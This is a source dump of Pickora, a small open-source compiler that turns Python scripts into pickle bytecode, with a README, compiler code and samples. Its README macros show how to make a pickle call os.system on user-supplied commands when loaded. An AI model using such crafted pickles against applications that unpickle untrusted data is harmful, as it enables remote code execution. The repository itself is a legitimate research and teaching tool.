├── .gitignore ├── LICENSE ├── README.md ├── pickora ├── __init__.py ├── __main__.py ├── compiler.py └── helper.py ├── samples ├── general.py ├── hello.py ├── macros.py ├── picklection.py ├── reddit_browser.py └── test_calculation.py └── setup.py /.gitignore: -------------------------------------------------------------------------------- 1 | *.pkl 2 | 3 | # Created by https://www.toptal.com/developers/gitignore/api/python 4 | # Edit at https://www.toptal.com/developers/gitignore?templates=python 5 | 6 | ### Python ### 7 | # Byte-compiled / optimized / DLL files 8 | __pycache__/ 9 | *.py[cod] 10 | *$py.class 11 | 12 | # C extensions 13 | *.so 14 | 15 | # Distribution / packaging 16 | .Python 17 | build/ 18 | develop-eggs/ 19 | dist/ 20 | downloads/ 21 | eggs/ 22 | .eggs/ 23 | lib/ 24 | lib64/ 25 | parts/ 26 | sdist/ 27 | var/ 28 | wheels/ 29 | share/python-wheels/ 30 | *.egg-info/ 31 | .installed.cfg 32 | *.egg 33 | MANIFEST 34 | 35 | # PyInstaller 36 | # Usually these files are written by a python script from a template 37 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 38 | *.manifest 39 | *.spec 40 | 41 | # Installer logs 42 | pip-log.txt 43 | pip-delete-this-directory.txt 44 | 45 | # Unit test / coverage reports 46 | htmlcov/ 47 | .tox/ 48 | .nox/ 49 | .coverage 50 | .coverage.* 51 | .cache 52 | nosetests.xml 53 | coverage.xml 54 | *.cover 55 | *.py,cover 56 | .hypothesis/ 57 | .pytest_cache/ 58 | cover/ 59 | 60 | # Translations 61 | *.mo 62 | *.pot 63 | 64 | # Django stuff: 65 | *.log 66 | local_settings.py 67 | db.sqlite3 68 | db.sqlite3-journal 69 | 70 | # Flask stuff: 71 | instance/ 72 | .webassets-cache 73 | 74 | # Scrapy stuff: 75 | .scrapy 76 | 77 | # Sphinx documentation 78 | docs/_build/ 79 | 80 | # PyBuilder 81 | .pybuilder/ 82 | target/ 83 | 84 | # Jupyter Notebook 85 | .ipynb_checkpoints 86 | 87 | # IPython 88 | profile_default/ 89 | ipython_config.py 90 | 91 | # pyenv 92 | # For a library or package, you might want to ignore these files since the code is 93 | # intended to run in multiple environments; otherwise, check them in: 94 | # .python-version 95 | 96 | # pipenv 97 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 98 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 99 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 100 | # install all needed dependencies. 101 | #Pipfile.lock 102 | 103 | # poetry 104 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 105 | # This is especially recommended for binary packages to ensure reproducibility, and is more 106 | # commonly ignored for libraries. 107 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 108 | #poetry.lock 109 | 110 | # pdm 111 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 112 | #pdm.lock 113 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 114 | # in version control. 115 | # https://pdm.fming.dev/#use-with-ide 116 | .pdm.toml 117 | 118 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 119 | __pypackages__/ 120 | 121 | # Celery stuff 122 | celerybeat-schedule 123 | celerybeat.pid 124 | 125 | # SageMath parsed files 126 | *.sage.py 127 | 128 | # Environments 129 | .env 130 | .venv 131 | env/ 132 | venv/ 133 | ENV/ 134 | env.bak/ 135 | venv.bak/ 136 | 137 | # Spyder project settings 138 | .spyderproject 139 | .spyproject 140 | 141 | # Rope project settings 142 | .ropeproject 143 | 144 | # mkdocs documentation 145 | /site 146 | 147 | # mypy 148 | .mypy_cache/ 149 | .dmypy.json 150 | dmypy.json 151 | 152 | # Pyre type checker 153 | .pyre/ 154 | 155 | # pytype static type analyzer 156 | .pytype/ 157 | 158 | # Cython debug symbols 159 | cython_debug/ 160 | 161 | # PyCharm 162 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 163 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 164 | # and can be added to the global gitignore or merged into this file. For a more nuclear 165 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 166 | #.idea/ 167 | 168 | ### Python Patch ### 169 | # Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration 170 | poetry.toml 171 | 172 | # ruff 173 | .ruff_cache/ 174 | 175 | # End of https://www.toptal.com/developers/gitignore/api/python 176 | 177 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 splitline 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pickora 🐰 2 | 3 | A small compiler that can convert Python scripts to pickle bytecode. 4 | 5 | ## Requirements 6 | 7 | - Python 3.8+ 8 | 9 | No third-party modules are required. 10 | 11 | ## Quick Start 12 | 13 | ### Installation 14 | 15 | **Using pip:** 16 | 17 | ```sh 18 | $ pip install pickora 19 | ``` 20 | 21 | **From source:** 22 | 23 | ```sh 24 | $ git clone https://github.com/splitline/Pickora.git 25 | $ cd Pickora 26 | $ python setup.py install 27 | ``` 28 | 29 | ### Basic Usage 30 | 31 | **Compile from a string:** 32 | 33 | ```sh 34 | $ pickora -c 'from builtins import print; print("Hello, world!")' -o output.pkl 35 | $ python -m pickle output.pkl # load the pickle bytecode 36 | Hello, world! 37 | None 38 | ``` 39 | 40 | **Compile from a file:** 41 | 42 | ```sh 43 | $ echo 'from builtins import print; print("Hello, world!")' > hello.py 44 | $ pickora hello.py # output compiled pickle bytecode to stdout directly 45 | b'\x80\x04\x95(\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x8c\x05print\x93\x94\x94h\x01\x8c\rHello, world!\x85R.' 46 | ``` 47 | 48 | ## Usage 49 | 50 | ``` 51 | usage: pickora [-h] [-c CODE] [-p PROTOCOL] [-e] [-O] [-o OUTPUT] [-d] [-r] 52 | [-f {repr,raw,hex,base64,none}] 53 | [source] 54 | 55 | A toy compiler that can convert Python scripts into pickle bytecode. 56 | 57 | positional arguments: 58 | source source code file 59 | 60 | optional arguments: 61 | -h, --help show this help message and exit 62 | -c CODE, --code CODE source code string 63 | -p PROTOCOL, --protocol PROTOCOL 64 | pickle protocol 65 | -e, --extended enable extended syntax (trigger find_class) 66 | -O, --optimize optimize pickle bytecode (with pickletools.optimize) 67 | -o OUTPUT, --output OUTPUT 68 | output file 69 | -d, --disassemble disassemble pickle bytecode 70 | -r, --run run (load) pickle bytecode immediately 71 | -f {repr,raw,hex,base64,none}, --format {repr,raw,hex,base64,none} 72 | output format, none means no output 73 | 74 | Basic usage: `pickora samples/hello.py` or `pickora --code 'print("Hello, world!")' --extended` 75 | ``` 76 | 77 | ## Supported Syntax 78 | 79 | ### Basic Syntax (achived by only using `pickle` opcodes) 80 | - Basic types: int, float, bytes, string, dict, list, set, tuple, bool, None 81 | - Assignment: `val = dict_['x'] = obj.attr = 'meow'` 82 | - Augmented assignment: `x += 1` 83 | - Named assignment: `(x := 1337)` 84 | - Unpacking: `a, b, c = 1, 2, 3` 85 | - Function call: `f(arg1, arg2)` 86 | - Doesn't support keyword argument. 87 | - Import 88 | - `from module import things` (directly using `STACK_GLOBALS` bytecode) 89 | - Macros (see below for more details) 90 | - `STACK_GLOBAL` 91 | - `GLOBAL` 92 | - `INST` 93 | - `OBJ` 94 | - `NEWOBJ` 95 | - `NEWOBJ_EX` 96 | - `BUILD` 97 | 98 | 99 | ### Extended Syntax (enabled by `-e` / `--extended` option) 100 | > Note: All extended syntaxes are implemented by importing other built-in modules. So with this option will trigger `find_class` when loading the pickle bytecode. 101 | 102 | - Attributes: `obj.attr` (using `builtins.getattr` only when you need to "load" an attribute) 103 | - Operators (using `operator` module) 104 | - Binary operators: `+`, `-`, `*`, `/` etc. 105 | - Unary operators: `not`, `~`, `+val`, `-val` 106 | - Compare: `0 < 3 > 2 == 2 > 1` (using `builtins.all` for chained comparing) 107 | - Subscript: `list_[1:3]`, `dict_['key']` (using `builtins.slice` for slice) 108 | - Boolean operators (using `builtins.next`, `builtins.filter`) 109 | - and: using `operator.not_` 110 | - or: using `operator.truth` 111 | - `(a or b or c)` -> `next(filter(truth, (a, b, c)), c)` 112 | - `(a and b and c)` -> `next(filter(not_, (a, b, c)), c)` 113 | - Import 114 | - `import module` (using `importlib.import_module`) 115 | - Lambda 116 | - `lambda x,y=1: x+y` 117 | - Using `types.CodeType` and `types.FunctionType` 118 | - [Known bug] If any global variables are changed after the lambda definition, the lambda function won't see those changes. 119 | 120 | 121 | ## Macros 122 | 123 | There are currently 4 macros available: `STACK_GLOBAL`, `GLOBAL`, `INST` and `BUILD`. 124 | 125 | ### `STACK_GLOBAL(modname: Any, name: Any)` 126 | 127 | **Example:** 128 | ```python 129 | function_name = input("> ") # > system 130 | func = STACK_GLOBAL('os', function_name) # 131 | func("date") # Tue Jan 13 33:33:37 UTC 2077 132 | ``` 133 | 134 | **Behaviour:** 135 | 1. PUSH modname 136 | 2. PUSH name 137 | 3. STACK_GLOBAL 138 | 139 | ### `GLOBAL(modname: str, name: str)` 140 | 141 | **Example:** 142 | ```python 143 | func = GLOBAL("os", "system") # 144 | func("date") # Tue Jan 13 33:33:37 UTC 2077 145 | ``` 146 | 147 | **Behaviour:** 148 | 149 | Simply write this piece of bytecode: `f"c{modname}\n{name}\n"` 150 | 151 | ### `INST(modname: str, name: str, args: tuple[Any])` 152 | 153 | **Example:** 154 | ```python 155 | command = input("cmd> ") # cmd> date 156 | INST("os", "system", (command,)) # Tue Jan 13 33:33:37 UTC 2077 157 | ``` 158 | 159 | Behaviour: 160 | 1. PUSH a MARK 161 | 2. PUSH `args` by order 162 | 3. Run this piece of bytecode: `f'i{modname}\n{name}\n'` 163 | 164 | ### `BUILD(inst: Any, state: Any, slotstate: Any)` 165 | 166 | > `state` is for `inst.__setstate__(state)` and `slotstate` is for setting attributes. 167 | 168 | **Example:** 169 | ```python 170 | from collections import _collections_abc 171 | BUILD(_collections_abc, None, {'__all__': ['ChainMap', 'Counter', 'OrderedDict']}) 172 | ``` 173 | 174 | **Behaviour:** 175 | 176 | 1. PUSH `inst` 177 | 2. PUSH `(state, slotstate)` (tuple) 178 | 3. PUSH `BUILD` 179 | 180 | ## FAQ 181 | 182 | ### What is pickle? 183 | 184 | [RTFM](https://docs.python.org/3/library/pickle.html). 185 | 186 | ### Why? 187 | 188 | It's cool. 189 | 190 | ### Is it useful? 191 | 192 | No, not at all, it's definitely useless. 193 | 194 | ### So, is this garbage? 195 | 196 | Yep, it's cool garbage. 197 | 198 | ### Would it support syntaxes like `if` / `while` / `for` ? 199 | 200 | No. All pickle can do is just simply define a variable or call a function, so this kind of syntax wouldn't exist. 201 | 202 | But if you want to do things like: 203 | ```python 204 | ans = input("Yes/No: ") 205 | if ans == 'Yes': 206 | print("Great!") 207 | elif ans == 'No': 208 | exit() 209 | ``` 210 | It's still achievable! You can rewrite your code like this: 211 | 212 | ```python 213 | from functools import partial 214 | condition = {'Yes': partial(print, 'Great!'), 'No': exit} 215 | ans = input("Yes/No: ") 216 | condition.get(ans, repr)() 217 | ``` 218 | ta-da! 219 | 220 | For the loop syntax, you can try to use `map` / `starmap` / `reduce` etc . 221 | 222 | And yes, you are right, it's functional programming time! 223 | 224 | -------------------------------------------------------------------------------- /pickora/__init__.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import pickle 3 | import sys 4 | import base64 5 | from .compiler import Compiler 6 | from .helper import PickoraError 7 | import ast 8 | 9 | 10 | def main(): 11 | description = "A toy compiler that can convert Python scripts into pickle bytecode." 12 | epilog = "Basic usage: `pickora samples/hello.py` or `pickora --code 'print(\"Hello, world!\")' --extended`" 13 | parser = argparse.ArgumentParser(description=description, epilog=epilog) 14 | parser.add_argument("source", nargs="?", help="source code file") 15 | 16 | parser.add_argument("-c", "--code", help="source code string") 17 | parser.add_argument("-p", "--protocol", type=int, 18 | default=pickle.DEFAULT_PROTOCOL, help="pickle protocol") 19 | parser.add_argument("-e", "--extended", action="store_true", 20 | help="enable extended syntax (trigger find_class)") 21 | parser.add_argument("-O", "--optimize", action="store_true", 22 | help="optimize pickle bytecode (with pickletools.optimize)") 23 | 24 | parser.add_argument("-o", "--output", help="output file") 25 | parser.add_argument("-d", "--disassemble", 26 | action="store_true", help="disassemble pickle bytecode") 27 | parser.add_argument("-r", "--run", action="store_true", 28 | help="run (load) pickle bytecode immediately") 29 | parser.add_argument("-f", "--format", 30 | choices=["repr", "raw", "hex", "base64", "none"], default="repr", help="output format, none means no output") 31 | 32 | args = parser.parse_args() 33 | 34 | if args.source and args.code: 35 | parser.error("You can only specify one of source code file or string.") 36 | 37 | if args.source: 38 | with open(args.source, "r") as f: 39 | source = f.read() 40 | elif args.code: 41 | source = args.code 42 | else: 43 | parser.error("You must specify source code file or string.") 44 | 45 | compiler = Compiler(protocol=args.protocol, 46 | optimize=args.optimize, extended=args.extended) 47 | 48 | try: 49 | code = compiler.compile(source, args.source) 50 | except PickoraError as e: 51 | print(e, file=sys.stderr) 52 | sys.exit(1) 53 | 54 | if args.disassemble: 55 | import pickletools 56 | try: 57 | pickletools.dis(code) 58 | except Exception as e: 59 | print("[x] Disassemble error:", e, file=sys.stderr) 60 | 61 | if args.output: 62 | with open(args.output, "wb") as f: 63 | f.write(code) 64 | else: 65 | if args.format == "repr": 66 | print(repr(code)) 67 | elif args.format == "raw": 68 | print(code.decode('latin1'), end="") 69 | elif args.format == "hex": 70 | print(code.hex()) 71 | elif args.format == "base64": 72 | print(base64.b64encode(code).decode()) 73 | elif args.format == "none": 74 | pass 75 | 76 | if args.run: 77 | print("[*] Running pickle bytecode...") 78 | ret = pickle.loads(code) 79 | print("[*] Return value:", repr(ret)) 80 | 81 | 82 | -------------------------------------------------------------------------------- /pickora/__main__.py: -------------------------------------------------------------------------------- 1 | from . import main 2 | 3 | if __name__ == "__main__": 4 | main() 5 | -------------------------------------------------------------------------------- /pickora/compiler.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import pickletools 3 | import ast 4 | import io 5 | import sys 6 | from struct import pack 7 | import types 8 | from typing import Any 9 | 10 | from .helper import PickoraError, PickoraNameError, PickoraNotImplementedError, op_to_method, extended, is_builtins, macro 11 | 12 | 13 | class NodeVisitor(ast.NodeVisitor): 14 | def __init__(self, pickler, extended=False): 15 | self.pickler = pickler 16 | self.proto = pickler.proto 17 | self.memo = {} 18 | 19 | self.extended = extended 20 | 21 | self.current_node = None 22 | 23 | def is_macro(self, macro_name): 24 | return hasattr(self, macro_name) and getattr(getattr(self, macro_name), '__macro__', False) 25 | 26 | @macro 27 | def BUILD(self, inst: Any, state: Any, slotstate: Any): 28 | self.visit(inst) 29 | self.visit(ast.Tuple(elts=(state, slotstate),)) 30 | self.write(pickle.BUILD) 31 | 32 | @macro(proto=4) 33 | def STACK_GLOBAL(self, name: Any, value: Any): 34 | self.visit(name) 35 | self.visit(value) 36 | self.write(pickle.STACK_GLOBAL) 37 | 38 | @macro 39 | def GLOBAL(self, module: str, name: str): 40 | self.write(f'c{module.value}\n{name.value}\n'.encode()) 41 | 42 | @macro 43 | def INST(self, module: str, name: str, args: ast.Tuple): 44 | self.write(pickle.MARK) 45 | for arg in args.elts: 46 | self.visit(arg) 47 | self.write(f'i{module.value}\n{name.value}\n'.encode()) 48 | 49 | @macro 50 | def OBJ(self, callable: Any, args: ast.Tuple): 51 | self.write(pickle.MARK) 52 | self.visit(callable) 53 | for arg in args.elts: 54 | self.visit(arg) 55 | self.write(pickle.OBJ) 56 | 57 | @macro(proto=2) 58 | def NEWOBJ(self, cls: Any, args: Any): 59 | self.visit(cls) 60 | self.visit(args) 61 | self.write(pickle.NEWOBJ) 62 | 63 | @macro(proto=4) 64 | def NEWOBJ_EX(self, cls: Any, args: Any, kwargs: Any): 65 | self.visit(cls) 66 | self.visit(args) 67 | self.visit(kwargs) 68 | self.write(pickle.NEWOBJ_EX) 69 | 70 | def visit_Constant(self, node): 71 | self.save(node.value) 72 | 73 | def visit_List(self, node): 74 | self.pickler.save_list(node.elts) 75 | 76 | def visit_Tuple(self, node): 77 | self.pickler.save_tuple(node.elts) 78 | 79 | def visit_Set(self, node): 80 | self.pickler.save_set(node.elts) 81 | 82 | def visit_Dict(self, node): 83 | self.pickler.save_dict({ 84 | key: value for key, value in zip(node.keys, node.values) 85 | }) 86 | 87 | def visit_Name(self, node): 88 | if node.id in self.memo: 89 | self.get(node.id) 90 | elif is_builtins(name=node.id): 91 | if not self.extended: 92 | raise PickoraError( 93 | "For using builtins, extended mode must be enabled (add -e or --extended option)" 94 | ) 95 | # auto import builtins 96 | self.find_class('builtins', node.id) 97 | self.put(node.id) 98 | else: 99 | raise PickoraNameError(f"Name '{node.id}' is not defined") 100 | 101 | def visit_NamedExpr(self, node): 102 | self.visit(node.value) 103 | self.put(node.target.id) 104 | 105 | def visit_Assign(self, node): 106 | targets, value = node.targets, node.value 107 | for target in targets: 108 | if isinstance(target, ast.Name): 109 | self.visit(value) 110 | self.put(target.id) 111 | elif isinstance(target, ast.Subscript): 112 | self.visit(target.value) 113 | self.visit(target.slice) 114 | self.visit(value) 115 | self.write(pickle.SETITEM) 116 | elif isinstance(target, ast.Attribute): 117 | # BUILD({}, {"attr": 1337}) 118 | self.visit(target.value) 119 | self.write(pickle.EMPTY_DICT) 120 | self.pickler.save_dict({target.attr: value}) 121 | self.write(pickle.TUPLE2 + pickle.BUILD) 122 | elif isinstance(target, ast.Tuple): 123 | # a, b = 1, 2 124 | if not hasattr(value, 'elts'): 125 | raise PickoraError( 126 | f"Cant unpack {type(value).__name__} to {type(target).__name__}" 127 | ) 128 | if len(target.elts) != len(value.elts): 129 | raise PickoraError( 130 | f"too many values to unpack (expected {len(target.elts)})" 131 | ) 132 | for i, (target, value) in enumerate(zip(target.elts, value.elts)): 133 | self.visit(value) 134 | self.visit_Assign( 135 | ast.Assign(targets=[target], value=value) 136 | ) 137 | else: 138 | raise PickoraNotImplementedError( 139 | f"Assigning to {type(target)} is not supported" 140 | ) 141 | 142 | def visit_Call(self, node): 143 | if isinstance(node.func, ast.Name) and self.is_macro(node.func.id): 144 | getattr(self, node.func.id)(*node.args) 145 | return 146 | 147 | self.visit(node.func) 148 | self.pickler.save_tuple(node.args) 149 | 150 | self.write(pickle.REDUCE) 151 | 152 | def visit_ImportFrom(self, node): 153 | for alias in node.names: 154 | self.find_class(node.module, alias.name) 155 | if alias.asname is not None: 156 | self.put(alias.asname) 157 | else: 158 | self.put(alias.name) 159 | 160 | def visit_Module(self, node): 161 | for stmt in node.body: 162 | self.visit(stmt) 163 | 164 | def visit_Expr(self, node): 165 | self.visit(node.value) 166 | 167 | # compatiblity with python 3.8 168 | def visit_Index(self, node): 169 | self.visit(node.value) 170 | 171 | @extended 172 | def visit_Import(self, node): 173 | for alias in node.names: 174 | self.call("importlib", "import_module", alias.name) 175 | if alias.asname is not None: 176 | self.put(alias.asname) 177 | else: 178 | self.put(alias.name) 179 | 180 | @extended 181 | def visit_AugAssign(self, node): 182 | op = type(node.op) 183 | self.call('operator', op_to_method[op], node.target, node.value) 184 | self.visit_Assign(ast.Assign([node.target], node.value)) 185 | 186 | @extended 187 | def visit_Subscript(self, node): 188 | self.call("operator", "getitem", node.value, node.slice) 189 | 190 | @extended 191 | def visit_Slice(self, node): 192 | self.call("builtins", "slice", node.lower, node.upper, node.step) 193 | 194 | @extended 195 | def visit_Attribute(self, node): 196 | self.call("builtins", "getattr", node.value, node.attr) 197 | 198 | @extended 199 | def visit_BinOp(self, node): 200 | op_func = op_to_method[type(node.op)] 201 | self.call("operator", op_func, node.left, node.right) 202 | 203 | @extended 204 | def visit_UnaryOp(self, node): 205 | operand = node.operand 206 | op_func = op_to_method[type(node.op)] 207 | self.call("operator", op_func, operand) 208 | 209 | @extended 210 | def visit_BoolOp(self, node): 211 | # (a or b or c) next(filter(truth, (a, b, c)), c) 212 | # (a and b and c) next(filter(not_, (a, b, c)), c) 213 | bool_ops = {ast.Or: 'truth', ast.And: 'not_'} 214 | op = ('operator', bool_ops[type(node.op)]) 215 | 216 | self.find_class(*op) 217 | op_func = self.put_temp() 218 | 219 | self.call('builtins', 'filter', ast.Name(id=op_func), node.values) 220 | filter_res = self.put_temp() 221 | 222 | self.call('builtins', 'next', ast.Name(id=filter_res), node.values[-1]) 223 | 224 | @extended 225 | def visit_Compare(self, node): 226 | self.write(pickle.MARK) 227 | left = node.left 228 | for op, right in zip(node.ops, node.comparators): 229 | self.call("operator", op_to_method[type(op)], left, right) 230 | left = right 231 | self.write(pickle.TUPLE) 232 | arg_id = str(id(node)) 233 | cmp_res = self.put_temp() 234 | self.call("builtins", "all", ast.Name(id=cmp_res)) 235 | 236 | @extended 237 | def visit_Lambda(self, node): 238 | code = compile(ast.Expression(body=node), '', 'eval') 239 | lambda_code = next(filter(lambda x: isinstance(x, types.CodeType), 240 | code.co_consts)) # get code object 241 | code_attrs = ('argcount', 'posonlyargcount', 'kwonlyargcount', 'nlocals', 'stacksize', 'flags', 242 | 'code', 'consts', 'names', 'varnames', 'filename', 'name', 'firstlineno', 'lnotab') 243 | code_args = [getattr(lambda_code, f"co_{attr}") for attr in code_attrs] 244 | globals_dict = {k: ast.Name(id=k) for k in code_args[8]} # co_names 245 | self.call("types", "CodeType", *code_args) 246 | co_code = self.put_temp() 247 | self.call("types", "FunctionType", 248 | ast.Name(id=co_code), 249 | globals_dict, 250 | None, 251 | tuple(node.args.defaults)) 252 | 253 | def find_class(self, module, name): 254 | if self.memo.get((module, name), None) is None: 255 | if self.proto >= 4: 256 | self.save(module) 257 | self.save(name) 258 | self.write(pickle.STACK_GLOBAL) 259 | elif self.proto >= 3: 260 | self.write(pickle.GLOBAL + bytes(module, "utf-8") + 261 | b'\n' + bytes(name, "utf-8") + b'\n') 262 | else: 263 | self.write(pickle.GLOBAL + bytes(module, "ascii") + 264 | b'\n' + bytes(name, "ascii") + b'\n') 265 | self.put((module, name)) 266 | else: 267 | self.get((module, name)) 268 | 269 | def call(self, module, name, *args): 270 | self.find_class(module, name) 271 | self.pickler.save_tuple(args) 272 | self.write(pickle.REDUCE) 273 | 274 | # memo related functions 275 | 276 | def put(self, name, pop=False): 277 | def op_put(idx): 278 | if self.pickler.bin: 279 | if idx < 256: 280 | return pickle.BINPUT + pack("= 4: 296 | self.memo[name] = len(self.memo) 297 | self.write(op_memoize()) 298 | else: 299 | idx = len(self.memo) 300 | self.memo[name] = idx 301 | self.write(op_put(idx)) 302 | 303 | if pop: 304 | self.write(pickle.POP) 305 | 306 | def put_temp(self): 307 | # generate a temporary name 308 | name = f"temp:{id(self.current_node)}" 309 | self.put(name, pop=True) 310 | return name 311 | 312 | def get(self, name): 313 | idx = self.memo[name] 314 | self.write(self.pickler.get(idx)) 315 | 316 | def visit(self, node): 317 | self.current_node = node 318 | 319 | if not hasattr(self, f"visit_{type(node).__name__}"): 320 | raise PickoraNotImplementedError( 321 | f"Pickora does not support {type(node).__name__} yet" 322 | ) 323 | 324 | return super().visit(node) 325 | 326 | def save(self, obj): 327 | self.pickler.save(obj) 328 | 329 | def write(self, obj): 330 | self.pickler.write(obj) 331 | 332 | 333 | # compile the source code into bytecode 334 | class Compiler(pickle._Pickler): 335 | def __init__(self, protocol=pickle.DEFAULT_PROTOCOL, optimize=False, extended=False): 336 | self.opcodes = io.BytesIO() 337 | self.optimize = optimize 338 | 339 | super().__init__(self.opcodes, protocol) 340 | self.codegen = NodeVisitor(self, extended=extended) 341 | self.fast = True # disable default memoization 342 | 343 | def compile(self, source, filename=""): 344 | if not filename: 345 | filename = "" 346 | 347 | if self.proto >= 2: 348 | self.write(pickle.PROTO + pack("= 4: 350 | self.framer.start_framing() 351 | try: 352 | self.codegen.visit(ast.parse(source)) 353 | except PickoraError as e: 354 | # fetch the source from current node (full line) 355 | lineno = self.codegen.current_node.lineno 356 | colno = self.codegen.current_node.col_offset 357 | collen = self.codegen.current_node.end_col_offset - colno 358 | 359 | source = source.splitlines()[lineno - 1] 360 | error_message = f"File '{filename}', line {lineno}\n" 361 | error_message += f"{source}\n" 362 | error_message += " " * \ 363 | (source.index(source.lstrip()) + colno) + "^"*collen + "\n\n" 364 | error_message += f"{e.__class__.__name__}: {e}" 365 | raise PickoraError(error_message) from e 366 | 367 | self.write(pickle.STOP) 368 | self.framer.end_framing() 369 | 370 | opcode = self.opcodes.getvalue() 371 | if self.optimize: 372 | return pickletools.optimize(opcode) 373 | return opcode 374 | 375 | def save(self, obj): 376 | if isinstance(obj, ast.AST): 377 | self.codegen.visit(obj) 378 | else: 379 | super().save(obj) 380 | -------------------------------------------------------------------------------- /pickora/helper.py: -------------------------------------------------------------------------------- 1 | import builtins 2 | import ast 3 | from functools import wraps 4 | import types 5 | from operator import attrgetter 6 | from typing import Any 7 | import pickle 8 | 9 | 10 | class PickoraError(Exception): 11 | pass 12 | 13 | 14 | class PickoraNameError(PickoraError): 15 | def __init__(self, *args, **kwargs): 16 | super().__init__(*args, **kwargs) 17 | 18 | 19 | class PickoraNotImplementedError(PickoraError): 20 | def __init__(self, *args, **kwargs): 21 | super().__init__(*args, **kwargs) 22 | 23 | 24 | def is_builtins(name): 25 | return name in builtins.__dir__() 26 | 27 | 28 | def extended(func): 29 | @wraps(func) 30 | def wrapper(self, *args, **kwargs): 31 | if self.extended: 32 | return func(self, *args, **kwargs) 33 | else: 34 | raise PickoraError( 35 | "Extended mode is not enabled (add -e or --extended option)" 36 | ) 37 | return wrapper 38 | 39 | 40 | def macro(*args, **kwargs): 41 | proto = kwargs.get('proto', 0) 42 | 43 | def decorator(func): 44 | @wraps(func) 45 | def wrapper(self, *args, **kwargs): 46 | if self.proto < proto: 47 | raise PickoraError( 48 | f"Macro {func.__name__} requires protocol {proto} but current protocol is {self.proto}" 49 | ) 50 | if len(args) != len(func.__annotations__): 51 | raise PickoraError( 52 | f"Macro {func.__name__} expected {len(func.__annotations__)} arguments but only got {len(args)}" 53 | ) 54 | 55 | # resolve ast.Constant 56 | _args = args 57 | 58 | args = [arg.value if type(arg) == ast.Constant else arg 59 | for arg in args] 60 | 61 | for arg, arg_type in zip(args, func.__annotations__.values()): 62 | if arg_type == Any: 63 | continue 64 | 65 | if not isinstance(arg, arg_type): 66 | def args2str(args): 67 | return ', '.join(map(attrgetter('__name__'), args)) 68 | expected = args2str(func.__annotations__.values()) 69 | provided = args2str(map(type, args)) 70 | raise PickoraError( 71 | f"Macro {func.__name__} expected({expected}) but got({provided})" 72 | ) 73 | 74 | return func(self, *_args, **kwargs) 75 | wrapper.__macro__ = True 76 | return wrapper 77 | 78 | if 'proto' in kwargs: 79 | wrapped = decorator 80 | return wrapped 81 | else: 82 | wrapped = decorator(args[0]) 83 | return wrapped 84 | 85 | 86 | op_to_method = { 87 | # BinOp 88 | ast.Add: 'add', 89 | ast.Sub: 'sub', 90 | ast.Mult: 'mul', 91 | ast.Div: 'truediv', 92 | ast.FloorDiv: 'floordiv', 93 | ast.Mod: 'mod', 94 | ast.Pow: 'pow', 95 | ast.LShift: 'lshift', 96 | ast.RShift: 'rshift', 97 | ast.BitOr: 'or', 98 | ast.BitXor: 'xor', 99 | ast.BitAnd: 'and', 100 | ast.MatMult: 'matmul', 101 | 102 | # UnaryOp 103 | ast.Invert: 'inv', 104 | ast.Not: 'not_', 105 | ast.UAdd: 'pos', 106 | ast.USub: 'neg', 107 | 108 | # Compare 109 | ast.Eq: "eq", 110 | ast.NotEq: "ne", 111 | ast.Lt: "lt", 112 | ast.LtE: "le", 113 | ast.Gt: "gt", 114 | ast.GtE: "ge", 115 | ast.Is: "is_", 116 | ast.IsNot: "is_not", 117 | ast.In: "contains", 118 | # ast.NotIn: "", 119 | # TODO: operator module doensn't include `not in` method 120 | } 121 | -------------------------------------------------------------------------------- /samples/general.py: -------------------------------------------------------------------------------- 1 | import string 2 | import base64 as b64 3 | from urllib.parse import quote 4 | from os import popen as run_cmd 5 | 6 | base = 2 7 | exp = 10 8 | 9 | print("pow(%d, %d) = %d" % (base, exp, pow(base, exp))) 10 | 11 | mixed_dict = {"int": 1337, "float": 3.14, "str": "Meow 🐈", 12 | "bytes": b'\x01\x02qwq\xff', "list": [1, 2, 3, [4, 5, 6]], 13 | "set": {'s', 1, 2, 3, 3, 3, (1+2)}} 14 | 15 | print(mixed_dict) 16 | print(mixed_dict['list']) 17 | print("Should be True:", (3 > (named_assign:=2) < 8 == 8 >= 8 <= 11) == True) 18 | print("named_assign:", named_assign) 19 | 20 | printable = string.printable 21 | print("URL encoded =", quote(printable)) 22 | print("Base64 encoded =", b64.b64encode(printable.encode()).decode()) 23 | print("Ascii =", ",".join(map(str, map(ord, printable)))) 